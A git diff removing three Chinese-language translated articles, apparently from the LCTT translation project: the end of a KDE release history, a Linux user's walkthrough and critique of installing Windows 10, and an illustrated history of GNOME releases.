-**KDE SC 4.7** 升级 KWin 以兼容 OpenGL ES 2.0 ,更新了 Qt Quick,Plasma Desktop 中在应用里普遍使用的新特性 1.2万个bug被修复。
-
-![25 January 2012](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/408.png)
-
-2012年1月25日
-
-**KDE SC 4.8**: 更好的 KWin 性能与 Wayland 支持,更新了 Doplhin 的外观设计。
-
-![1 August 2012](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/409.png)
-
-2012年8月1日
-
-**KDE SC 4.9**: 向 Dolphin 文件管理器增加了一些更新,比如加入了实时文件重命名,鼠标辅助按钮支持,更好的位置标签和更多文件分类管理功能。
-
-![6 February 2013](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/410.png)
-
-2013年2月6日
-
-**KDE SC 4.10**: 很多 Plasma 插件使用 QML 重写; Nepomuk,Kontact 和 Okular 得到了很大程度的性能和功能提升。
-
-![14 August 2013](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/411.png)
-
-2013年8月14日
-
-**KDE SC 4.11**: Kontact 和 Nepomuk 有了很大的优化。 第一代 Plasma Workspaces 进入了仅有维护而没有新生开发的软件周期。
-
-![18 December 2013](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/412.png)
-
-2013年12月18日
-
-**KDE SC 4.12**: Kontact 得到了极大的提升。
-
-![16 April 2014](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/413.png)
-
-2014年4月16日
-
-**KDE SC 4.13**: Nepomuk 语义搜索功能替代了桌面上的原有的Baloo搜索。 KDE SC 4.13 发布了53个语言版本。
-
-![20 August 2014](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/414.png)
-
-2014年8月20日
-
-**KDE SC 4.14**: 这个发布版本侧重于稳定性提升:大量的bug修复和小更新。这是最后一个 KDE SC 4 发布版本。
-
-### KDE Plasma 5.0 – 2014年7月15日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/500.png)
-
-KDE Plasma 5 – 第五代 KDE。大幅改进了设计和系统,新的默认主题 ---- Breeze,完全迁移到了 QML,更好的 OpenGL 性能,更完美的 HiDPI (高分辨率)显示支持。
-
-![11 November 2014](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/501.png)
-
-2014年11月11日
-
-**KDE Plasma 5.1**:加入了Plasma 4里原先没有补完的功能。
-
-![27 January 2015](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/502.png)
-
-2015年1月27日
-
-**KDE Plasma 5.2**:新组件:BlueDevil,KSSHAskPass,Muon,SDDM 主题设置,KScreen,GTK+ 样式设置 和 KDecoration.
-
-![28 April 2015](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/503.png)
-
-2015年4月28日
-
-**KDE Plasma 5.3**:Plasma Media Center 技术预览。新的蓝牙和触摸板小程序;改良了电源管理。
-
-![25 August 2015](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/504.png)
-
-2015年8月25日
-
-**KDE Plasma 5.4**:Wayland 登场,新的基于 QML 的音频管理程序,交替式全屏程序显示。
-
-万分感谢 [KDE][1] 开发者和社区及Wikipedia 为书写 [概述][2] 带来的帮助,同时,感谢所有读者。希望大家保持自由精神(be free)并继续支持如同 KDE 一样的开源的自由软件发展。
-
---------------------------------------------------------------------------------
-
-via: [https://tlhp.cf/kde-history/](https://tlhp.cf/kde-history/)
-
-作者:[Pavlo RudyiCategories][a] 译者:[jerryling315](https://github.com/jerryling315) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]: https://www.kde.org/
-[2]: https://en.wikipedia.org/wiki/KDE_Plasma_5
-[a]: https://tlhp.cf/author/paul/
diff --git a/translated/talk/20150818 A Linux User Using Windows 10 After More than 8 Years--See Comparison.md b/translated/talk/20150818 A Linux User Using Windows 10 After More than 8 Years--See Comparison.md
deleted file mode 100644
index 6f821f777d..0000000000
--- a/translated/talk/20150818 A Linux User Using Windows 10 After More than 8 Years--See Comparison.md
+++ /dev/null
@@ -1,344 +0,0 @@
-对比Windows 10与Linux:Linux用户已经使用'Windows 10'超过8年
-==============================================================================================================================================================
-Windows 10 是2015年7月29日上市的最新一代Windows NT系列系统,Windows 8.1 的继任者.Windows 10 支持Intel 32位平台,AMD64以及ARM v7处理器.
-
-![Windows 10 and Linux Comparison](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-vs-Linux.jpg)
-
-对比:Windows 10与Linux
-
-作为一个连续使用linux超过8年的用户,我想要去测试Windows 10 ,因为它最近制造了很多新闻.这篇文章是我观察力的一个重大突破.我将从一个linux用户的角度去看待一切,所以这篇文章可能会有些偏向于linux.尽管如此,本文也应该不会有任何错误信息.
-
-1. 用谷歌搜索"download Windows 10" 并且点击第一个链接.
-
-![Search Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Search-Windows-10.jpg)
-
-搜索Windows 10
-
-你也可以直接打开: [https://www.microsoft.com/en_us/software-download/Windows10[1]
-
-2. 微软要求我从Windows 10, Windows 10 KN, Windows 10 N 和Windows 10 单语言版中选择一个版本
-
-![Select Windows 10 Edition](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Windows-10-Edition.jpg)
-
-选择版本
-
-以下是各个版本的简略信息:
-
-- Windows 10 - 包含微软提供给我们的所有软件
-- Windows 10N - 此版本不包含媒体播放器
-- Windows 10KN - 此版本没有媒体播放能力
-- Windows 10单语言版 - 仅预装一种语言
-
-3. 我选择了第一个选项 " Windows 10"并且单击"确认".之后我要选择语言,我选择了"英语"
-
-微软给我提供了两个下载链接.一个是32位版,另一个是64位版.我单击了64位版--这与我的电脑架构相同.
-
-![Download Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Download-Windows-10.jpg)
-
-下载Windows 10
-
-我的带宽是15M的,下载了整整3个小时.不幸的是微软没有提供系统的种子文件,否则整个过程会更加舒畅.镜像大小为 3.8 GB(译者注:就我的10M小水管,我使用迅雷下载用时50分钟).
-
-我找不到更小的镜像,微软并没有为Windows提供网络安装镜像.我也没有办法在下载完成后去校验哈希值.
-
-我十分惊讶,Windows在这样的问题上居然如此漫不经心.为了验证这个镜像是否正确下载,我需要把它刻到光盘上或者复制到我的U盘上然后启动它,一直静静的看着它安装直到安装完成.
-
-首先,我用dd命令将win10的iso镜像刻录到U盘上
-
- # dd if=/home/avi/Downloads/Win10_English_x64.iso of=/dev/sdb1 bs=512M; sync
-
-这需要一点时间.在此之后我重启系统并在UEFI(BIOS)设置中选择从我的U盘启动.
-
-#### 系统要求 ####
-
-升级
-
-- 仅支持从Windows 7 SP1或者Windows 8.1升级
-
-重新安装
-
-- 处理器: 1GHz 以上
-- 内存: 1GB以上(32位),2GB以上(64位)
-- 硬盘: 16GB以上(32位),20GB以上(64位)
-- 显卡: 支持DirectX 9或更新 + WDDM 1.0 驱动
-
-###Windows 10 安装过程###
-
-1. Windows 10启动成功了.他们又换了logo,但是仍然没有信息提示我它正在做什么.
-
-![Windows 10 Logo](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Logo.jpg)
-
-Windows 10 Logo
-
-2. 选择安装语言,时区,键盘,输入法,点击下一步
-
-![Select Language and Time](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Language-and-Time.jpg)
-
-选择语言和时区
-
-3. 点击'现在安装'
-
-![Install Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Install-Windows-10.jpg)
-
-安装Windows 10
-
-4. 下一步是输入密钥,我点击了跳过
-
-![Windows 10 Product Key](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Product-Key.jpg)
-
-Windows 10 产品密钥
-
-5. 从列表中选择一个系统版本.我选择了Windows 10专业版
-
-![Select Install Operating System](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Install-Operating-System.jpg)
-
-选择系统版本
-
-6. 到了协议部分,选中"我接受"然后点击下一步
-
-![Accept License](http://www.tecmint.com/wp-content/uploads/2015/08/Accept-License.jpg)
-
-同意协议
-
-7. 下一步是选择(从Windows的老版本)升级到Windows 10或者安装Windows.我搞不懂为什么微软要让我自己选择:"安装Windows"被微软建议为"高级"选项.但是我还是选择了"安装Windows".
-
-![Select Installation Type](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Installation-Type.jpg)
-
-选择安装类型
-
-8. 选择驱动器,点击"下一步"
-
-![Select Install Drive](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Install-Drive.jpg)
-
-选择安装盘
-
-9. 安装程序开始复制文件,准备文件,安装更新,之后进行收尾.(如果安装程序能在安装时输出一堆字符来表示他在做什么就更好了)
-
-![Installing Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Installing-Windows.jpg)
-
-安装 Windows
-
-10. 在此之后Windows重启了.他们说为了继续,我们需要重启
-
-![Windows Installation Process](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Installation-Process.jpg)
-
-安装进程
-
-11. 我看到了一个写着"正在准备Windows"的界面.它停了整整五分多钟,仍然没有说明它正在做什么.没有输出.
-
-![Windows Getting Ready](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Getting-Ready.jpg)
-
-正在准备Windows
-
-12. 又到了输入产品密钥的时间.我点击了"以后再说",并使用快速设置
-
-![Enter Product Key](http://www.tecmint.com/wp-content/uploads/2015/08/Enter-Product-Key.jpg)
-
-输入产品密钥
-
-![Select Express Settings](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Express-Settings.jpg)
-
-使用快速设置
-
-
-13. 又出现了三个界面,作为Linux用户我认为此处应有信息来告诉我安装程序在做什么,但是我想多了
-![Loading Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Loading-Windows.jpg)
-
-载入 Windows
-
-![Getting Updates](http://www.tecmint.com/wp-content/uploads/2015/08/Getting-Updates.jpg)
-
-获取更新
-
-![Still Loading Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Still-Loading-Windows.jpg)
-
-还是载入 Windows
-
-14. 安装程序想要知道谁拥有这台机器,"我的组织"或者我自己
-
-![Select Organization](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Organization.jpg)
-
-选择组织
-
-15. 安装程序提示我加入"Aruze Ad"或者"加入域".在单击继续之前,我选择了后者.
-
-![Connect Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Connect-Windows.jpg)
-
-连接网络
-
-16. 安装程序让我新建一个账户.所以我输入了 "user_name"并点击下一步,我觉得我会收到一个要求我必须输入密码的信息.
-
-![Create Account](http://www.tecmint.com/wp-content/uploads/2015/08/Create-Account.jpg)
-
-新建账户
-
-17. 让我惊讶的是Windows甚至都没有警告/发现我必须创建密码.真粗心.不管怎样,现在我可以体验系统了.
-
-![Windows 10 Desktop](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Desktop.jpg)
-
-Windows 10的桌面环境
-
-#### Linux用户(我)直到现在的体验 ####
-
-- 没有网络安装镜像
-- 镜像文件太臃肿了
-- 没有验证iso是否为正确的方法(官方没有提供哈希值)
-- 启动与安装方式仍然与XP,Win 7,Win 8相同(可能吧...)
-- 和以前一样,安装程序没有输出他正在干什么 - 正在复制什么和正在安装什么软件包
-- 安装程序比Linux发行版的更加直白和简单
-
-####测试 Windows####
-
-18. 默认桌面很干净,上面只有一个回收站图标.我们可以直接从桌面搜索网络.底部的快捷方式分别是任务预览,网络,微软应用商店.和以前的版本一样,消息栏在右下角.
-
-![ ](http://www.tecmint.com/wp-content/uploads/2015/08/Deskop-Shortcut-icons.jpg)
-
-桌面图标
-
-19. IE浏览器被换成了Edge浏览器.微软把他们的老IE换成了Edge(斯巴达计划)
-
-![Microsoft Edge Browser](http://www.tecmint.com/wp-content/uploads/2015/08/Edge-browser.jpg)
-
-Edge浏览器
-
-这个浏览器至少比IE要快.他们有相同的用户界面.它的主页包含新的更新.它还有一个标题是"下一步怎么走".由于它全面的性能提升,它的加载速度非常快.Edge的内存占用看起来一般般.
-
-![Windows Performance](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Performance.jpg)
-
-性能
-
-Edge也有小娜加成 -- 智能个人助理.支持笔记(在浏览网页时记笔记),分享(在本TAB分享而不必打开其他TAB)
-
-#### Linux用户(我)此时体验 ####
-
-20. 微软确实提升了网页浏览体验.我们要看的就是他的稳定性和质量.现在它并不落后.
-
-21. 对我来说,Edge的内存占用不算太大.但是有很多用户抱怨他的内存占用.
-
-22. 很难说目前Edge已经准备好了与火狐或Chrome竞争.让我们静观其变.
-
-#### 更多的视觉体验 ####
-
-23. 重新设计的开始菜单 -- 看起来很简洁高效.Merto磁贴大部分都会动.预先放置了最通用的应用.
-
-![Windows Look and Feel](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Look.jpg)
-
-Windows
-
-在Linux的Gnome桌面环境下.我仅仅需要按下Win键并输入应用名就可以搜索应用.
-
-![Search Within Desktop](http://www.tecmint.com/wp-content/uploads/2015/08/Search-Within-Desktop.jpg)
-
-桌面内进行搜索
-
-24. 文件浏览器 -- 设计的很简洁.左边是进入文件夹的快捷方式.
-
-![Windows File Explorer](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-File-Explorer.jpg)
-
-Windows资源管理器
-
-我们的Gnome下的文件管理也同样的简洁高效.
-
-![File Browser on Gnome](http://www.tecmint.com/wp-content/uploads/2015/08/File-Browser.jpg)
-
-Gnome 的文件管理
-
-25. 设置 -- 尽管Windows 10的设置有点精炼,但是我们还是可以把它与linux的设置进行对比.
-
-**Windows 的设置**
-
-![Windows 10 Settings](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Settings.jpg)
-
-Windows 10 设置
-
-**Linux Gnome 上的设置**
-
-![Gnome Settings](http://www.tecmint.com/wp-content/uploads/2015/08/Gnome-Settings.jpg)
-
-Gnome 的设置
-
-26. 应用列表 -- 目前,Linux上的应用列表比之前的版本要好一些
-
-**Windows 的应用列表**
-
-![Application List on Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Application-List-on-Windows-10.jpg)
-
-Windows 10 的应用列表
-
-**Gnome3 的应用列表**
-
-![Gnome Application List on Linux](http://www.tecmint.com/wp-content/uploads/2015/08/Gnome-Application-List-on-Linux.jpg)
-
-Gnome3 的应用列表
-
-27. 虚拟桌面 -- Windows 10 上的虚拟桌面是近来被提及最多的特性之一
-
-这是Windows 10 上的虚拟桌面.
-
-![Windows Virtual Desktop](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Virtual-Desktop.jpg)
-
-Windows的虚拟桌面
-
-这是我们Linux用户使用了超过20年的虚拟桌面.
-
-![Virtual Desktop on Linux](http://www.tecmint.com/wp-content/uploads/2015/08/Virtual-Desktop-on-Linux.jpg)
-
-Linux的虚拟桌面
-
-#### Windows 10 的其他新特性 ####
-
-28. Windows 10 自带wifi感知.它会把你的wifi密码分享给他人.任何在你wifi范围内并且曾经通过Skype, Outlook, Hotmail 或 Facebook与你联系的人都能够获得你的网络接入权.这个特性的本意是让用户可以省时省力的连接网络.
-
-在微软对于 Tecmint 的问题的回答中,他们说道 -- 用户需要在每次到一个新的网络环境时自己去同意打开wifi感知.如果我们考虑到网络安全这将是很不安全的一件事.微软的说法并没有说服我.
-
-29. 从Windows 7 和 Windows 8.1升级可以省下买新版的花费.(家庭版$119 专业版$199 )
-
-30. 微软发布了第一个累积更新,这个更新在一小部分设备上会让系统一直重启.Windows可能不知道这个问题或者不知道它发生的原因.
-
-31. 微软内建的禁用/隐藏我不想要的更新的功能在我这不起作用.这意味着一旦更新开始推送,你没有方法去禁用/隐藏他们.对不住啦,Windows 用户.
-
-#### Windows 10 包含的来源于Linux的功能 ####
-
-Windows 10有很多直接取自Linux的功能.如果Linux不已GPL发布的话,以下下这些功能永远不会出现在Windows上.
-
-32. 包管理器 -- 是的,你没有听错!Windows 10内建了一个包管理器.它只在Power Shell下工作.OneGet是Windows的官方包管理器.
-
-![Windows 10 Package Manager](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Package-Manager.jpg)
-
- Windows 10的包管理器
-
-- 无国界的Windows
-- 扁平化图标
-- 虚拟桌面
-- 离线/在线搜索一体化
-- 手机/桌面系统一体化
-
-### 总体印象###
-
-- 响应速度提升
-- 动画很好看
-- 资源占用少
-- 电池续航提升
-- Edge浏览器坚如磐石
-- 支持树莓派 2
-- Windows 10好的原因是Windows 8/8.1没有达到公众预期并且坏的可以
-- 旧瓶装新酒:Windows 10基本上就是以前的那一套换上新的图标
-
-测试后我对Windows 10的评价是:Windows 10 在视觉和感觉上做了一些更新(就如同Windows经常做的那样).我要为斯巴达计划,虚拟桌面,命令行包管理器,整合在线/离线搜索的搜索栏点赞.这确实是一个更新后的产品 ,但是认为Windows 10将是Linux的最后一个棺材钉的人错了.
-
-Linux走在Windows前面.它们的做事方法并不相同.在以后的一段时间里Windows不会站到Linux这一旁.Linux用户也不必去使用Windows 10.
-
-这就是我要说的.希望你喜欢本文.如果你们喜欢本篇文章我会再写一些你们喜欢读的有趣的文章.在下方留下你的有价值的评论.
-
---------------------------------------------------------------------------------
-
-via: http://www.tecmint.com/a-linux-user-using-Windows-10-after-more-than-8-years-see-comparison/
-
-作者:[vishek Kumar][a]
-译者:[name1e5s](https://github.com/name1e5s)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.tecmint.com/author/avishek/
-[1]:https://www.microsoft.com/en-us/software-download/Windows10ISO
diff --git a/translated/talk/20151020 18 Years of GNOME Design and Software Evolution--Step by Step.md b/translated/talk/20151020 18 Years of GNOME Design and Software Evolution--Step by Step.md
deleted file mode 100644
index 614f10bb85..0000000000
--- a/translated/talk/20151020 18 Years of GNOME Design and Software Evolution--Step by Step.md
+++ /dev/null
@@ -1,200 +0,0 @@
-
-一步一脚印:GNOME十八年进化史
-================================================================================
-注:youtube 视频
-
-
-[GNOME][1] (GNU Object Model Environment)由两位墨西哥的程序员Miguel de Icaza和Federico Mena 始创于1997年8月15日。GNOME自由软件的桌面环境和应用程序计划由志愿者和全职开发者来开发。所有的GNOME桌面环境都由开源软件组成,并且支持Linux, FreeBSD, OpenBSD 等操作系统。
-
-现在就让我穿越到1997年来看看GNOME的第一个版本:
-
-### GNOME 1 ###
-
-![GNOME 1.0 - First major GNOME release](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/1.0/gnome.png)
-
-**GNOME 1.0** (1997) – GNOME 发布的第一个版本
-
-![GNOME 1.2 Bongo](https://raw.githubusercontent.com/paulcarroty/Articles/master/GNOME_History/1.2/1361441938.or.86429.png)
-
-**GNOME 1.2** “Bongo”, 2000
-
-![GNOME 1.4 Tranquility](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/1.4/1.png)
-
-**GNOME 1.4** “Tranquility”, 2001
-
-### GNOME 2 ###
-
-![GNOME 2.0](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.0/1.png)
-
-**GNOME 2.0**, 2002
-
-基于GTK+2的重大更新。引入了人机界面指南。
-
-![GNOME 2.2](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.2/GNOME_2.2_catala.png)
-
-**GNOME 2.2**, 2003
-
-改进了多媒体和文件管理器。
-
-![GNOME 2.4 Temujin](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.4/gnome-desktop.png)
-
-**GNOME 2.4** “Temujin”, 2003
-
-首次发布Epiphany浏览器,增添了辅助功能。
-
-![GNOME 2.6](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.6/Adam_Hooper.png)
-
-**GNOME 2.6**, 2004
-
-启用Nautilus空间文件管理工具同时引入了新的GTK+ (译注:跨平台图形用户界面工具包)对话框。这个转瞬即逝的版本变更被称做是GNOME的一个分支:GoneME。
-
-![GNOME 2.8](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.8/3.png)
-
-**GNOME 2.8**, 2004
-
-改良了对可移动设备的支持并新增了Evolution邮件应用。
-
-![GNOME 2.10](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.10/GNOME-Screenshot-2.10-FC4.png)
-
-**GNOME 2.10**, 2005
-
-减小内存需求,改进显示界面。增加网络控制、磁盘挂载和回收站组件以及Totem影片播放器和Sound Juicer CD抓取工具。
-
-![GNOME 2.12](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.12/gnome-livecd.jpg)
-
-**GNOME 2.12**, 2005
-
-改进了Nautilus以及跨平台剪切/粘贴功能的整合。 新增Evince PDF阅读器;新预设主题Clearlooks;新增菜单编辑器、管理员工具与环状管理器。基于支持Cairo的GTK+2.8。
-
-![GNOME 2.14](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.14/debian4-stable.jpg)
-
-**GNOME 2.14**, 2006
-
-改善显示效果;增强易用性;基于GStreamer 0.10多媒体框架。增加了Ekiga视频会议应用,Deskbar搜索工具,Pessulus权限管理器,和Sabayon系统管理员工具和快速切换用户功能。
-
-![GNOME 2.16](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.16/Gnome-2.16-screenshot.png)
-
-**GNOME 2.16**, 2006
-
-界面改良。增加了Tomboy笔记应用,Baobab磁盘用量分析应用,Orca屏幕朗读器以及GNOME 电源管理程序(以延长笔记本电池寿命);改进了Totem, Nautilus, 使用了新的图标主题。基于GTK+ 2.0 的全新显示对话框。
-
-![GNOME 2.18](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.18/Gnome-2.18.1.png)
-
-**GNOME 2.18**, 2007
-
-界面改良。增加了Seahorse GPG安全应用,可以对邮件和本地文件进行加密;Baobab增加了环状图表显示方式;改进了Orca,Evince, Epiphany, GNOME电源管理,音量控制;增加了两款新游戏:GNOME数独和国际象棋。支持MP3和AAC音频解码。
-
-![GNOME 2.20](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.20/rnintroduction-screenshot.png)
-
-**GNOME 2.20**, 2007
-
-发布十周年版本。Evolution增加了备份功能;改进了Epiphany,EOG,GNOME电源管理以及Seahorse中的Keyring密码管理方式;在Evince中可以编辑PDF文档;文件管理界面中整合了搜索模块;自动安装多媒体解码器。
-
-![GNOME 2.22, 2008](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.22/GNOME-2-22-2-Released-2.png)
-
-**GNOME 2.22**, 2008
-
-新增Cheese应用,它是一个可以截取网络摄像头和远程桌面图像的工具;Metacity支持基本的窗口叠加复合;引入GVFS(译注:GNOME Virtual file system,GNOME虚拟文件系统);改善了Totem播放DVD 和YouTube的效果,支持播放MythTV;在Evolution中新增了谷歌日历以及为信息添加标签的功能;改进了Evince, Tomboy, Sound Juicer和计算器。
-
-![GNOME 2.24](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.24/gnome-224.jpg)
-
-**GNOME 2.24**, 2008
-
-新增了Empathy即时通讯软件,Ekiga升级至3.0版本;Nautilus支持标签式浏览,更好的支持了多屏幕显示方式和数字电视功能。
-
-![GNOME 2.26](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.26/gnome226-large_001.jpg)
-
-**GNOME 2.26**, 2009
-
-新增光盘刻录应用Brasero;简化了文件分享的流程,改进了媒体播放器的性能;支持多显示器和指纹识别器。
-
-![GNOME 2.28](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.28/1.png)
-
-**GNOME 2.28**, 2009
-
-增加了GNOME 蓝牙模块;改进了Epiphany ,Empathy,时间追踪器和辅助功能。GTK+升级至2.18版本。
-
-![GNOME 2.30](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.30/GNOME2.30.png)
-
-**GNOME 2.30**, 2010
-
-改进了Nautilus,Empathy,Tomboy,Evince,Time Tracker,Epiphany和 Vinagre。借助基于libimobiledevice(译注:支持iOS®设备跨平台使用的工具协议库)的GVFS可以访问部分iPod 和iPod Touch。
-
-![GNOME 2.32](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.32/gnome-2-32.png.en_GB.png)
-
-**GNOME 2.32**, 2010
-
-新增Rygel 媒体分享工具和GNOME色彩管理器;改进了Empathy即时通讯客户端,Evince,Nautilus文件管理器等。计划于2010年9月发布3.0版本,因此大部分开发者的精力都由2.3x转移至了3.0版本。
-
-### GNOME 3 ###
-
-![GNOME 3.0](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.0/chat-3-0.png)
-
-**GNOME 3.0**, 2011
-
-引入GNOME Shell,一个重新设计的、具有更简练更集中的选项的框架。基于Mallard标记语言的话题导向型帮助。支持窗口并列堆叠。启用新的视觉主题和字体。采用GTK+3.0,具有更好的语言绑定,主题,触控以及多平台支持。去除了长期弃用的API。
-
-![GNOME 3.2](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.2/gdm.png)
-
-**GNOME 3.2**, 2011
-
-支持在线帐户,Web应用;新增通讯录应用和文档文件管理器;文件管理器支持快速预览;整合性能,更新文档以及对外观的一些小改进。
-
-![GNOME 3.4](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.4/application-view.png)
-
-**GNOME 3.4**, 2012
-
-全新的GNOME 3 应用程序外观:文件,Epiphany(更名为Web),GNOME 通讯录。可以在Activities Overview中搜索本地文件。支持应用菜单。焕然一新的界面元素:崭新的颜色拾取器,重新设计的滚动条,更易使用的旋转按钮以及可隐藏的标题栏。支持视角平滑。全新的动态壁纸。在系统设置中增添了对Wacom数位板的支持。更简便的扩展应用管理。更好的硬件支持。面向主题的文档。在Empathy中提供了对视频电话和动态信息的支持。更好的辅助功能:提升Orca整合度,增强高对比度模式适配性,以及全新的缩放设置。大量应用和细节的改进。
-
-![GNOME 3.6](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.6/gnome-3-6.png)
-
-**GNOME 3.6**, 2012
-
-全新设计的核心元素:新的应用按钮和改进的Activities Overview布局。新的登陆锁定界面。重新设计的通知栏。通知现在更智能,可见性更高,同时更容易操作。改进了系统设置的界面和设定逻辑。用户菜单默认显示关机操作。整合了输入法。辅助功能一直开启。新的应用:Boxes虚拟机,在GNOME 3.4中发布了预览版。Clocks时钟, 可以显示世界时间。升级了磁盘用量分析,Empathy和 Font Viewer的外观。改进了Orca对布莱叶盲文的支持。 在Web浏览器中, 用最常访问页面取代了之前的空白起始页,增添了更好的全屏模式并使用了WebKit2测试版引擎. Evolution 开始使用WebKit提交邮件。 改进了磁盘功能。 改进了文件管理应用即之前的Nautilus, 新增诸如最近访问的文件和搜索等功能。
-
-![GNOME 3.8](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.8/applications-view.png)
-
-**GNOME 3.8**, 2013
-
-令人耳目一新的核心组件:新应用界面可以分别显示常用应用及全部应用,窗口布局得到全面改造。新的屏幕即现式输入法开关。通知和信息现在会对屏幕边缘的点击作出回应。为那些喜欢传统桌面的用户提供了经典模式。重新设计了设置界面的工具栏。新的初始化引导流程。GNOME 在线帐户添加了对更多供应商的支持。浏览器正式启用WebKit2引擎。文档支持双页模式并且整合了Google 文档。通讯录的UI升级。GNOME Files,GNOME Boxes和GNOME Disks都得到了大幅改进。两款全新的GNOME核心应用:GNOME时钟和GNOME天气。
-
-![GNOME 3.10](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.10/GNOME-3-10-Release-Schedule-2.png)
-
-**GNOME 3.10**, 2013
-
-全新设计的系统状态界面,能够更直观的纵览全局。一系列新应用,包括GNOME Maps, GNOME Notes, GNOME Music 和GNOME Photos。新的基于位置的功能,如自动时区和世界时间。支持高分辨率及智能卡。 基于GLib 2.38提供了对D-Bus的支持。
-
-![GNOME 3.12](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.12/app-folders.png)
-
-**GNOME 3.12**, 2014
-
-改进了Overview中的键盘导航和窗口选择,基于易用性测试对初始设置进行了修改。有线网络重新回到了状态栏上,在应用预览中可以自定义应用文件夹。在大量应用的对话框中引入了新的GTK+小工具同时使用了新的GTK+标签风格。GNOME Videos,GNOME 终端以及Gedit都改用了全新外观,更贴合HIG(译注:Human Interface Guidelines,人机界面指南)。在GNOME Shell的终端仿真器中提供了搜索预测功能。增强了对GNOME软件和高密度显示屏的支持。提供了新的录音工具。增加了新的桌面通知接口。在Wayland中的进程被置于更易使用的位置并可以进行选择性预览。
-
-![GNOME 3.14](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.14/Top-Features-of-GNOME-3-14-Gallery-459893-2.jpg)
-
-**GNOME 3.14**, 2014
-
-更炫酷的桌面环境效果,改善了对触摸屏的支持。GNOME Software supports managing installed add-ons. 在GNOME Photos中可以访问Google相册。重绘了Evince,数独,扫雷和天气应用的用户界面,同时增加了一款叫做Hitori 的GNOME游戏。
-
-![GNOME 3.16](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.16/preview-apps.png)
-
-**GNOME 3.16**, 2015
-
-33,000处改变。主要修改了UI的配色方案。 增加了即现式滚动条。通知窗口中整合了日历应用。对文件管理器,图像查看器和地图等大量应用进行了微调。可以预览应用程序。进一步使用Wayland取代X11。
-
-感谢GNOME Project及[Wikipedia][2]提供的变更日志!感谢阅读!(译注:原文此处为“敬请期待”。)
-
-
---------------------------------------------------------------------------------
-
-via: https://tlhp.cf/18-years-of-gnome-evolution/
-
-作者:[Pavlo Rudyi][a]
-译者:[Haohong WANG](https://github.com/HaohongWANG)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://tlhp.cf/author/paul/
-[1]:https://www.gnome.org/
-[2]:https://en.wikipedia.org/wiki/GNOME
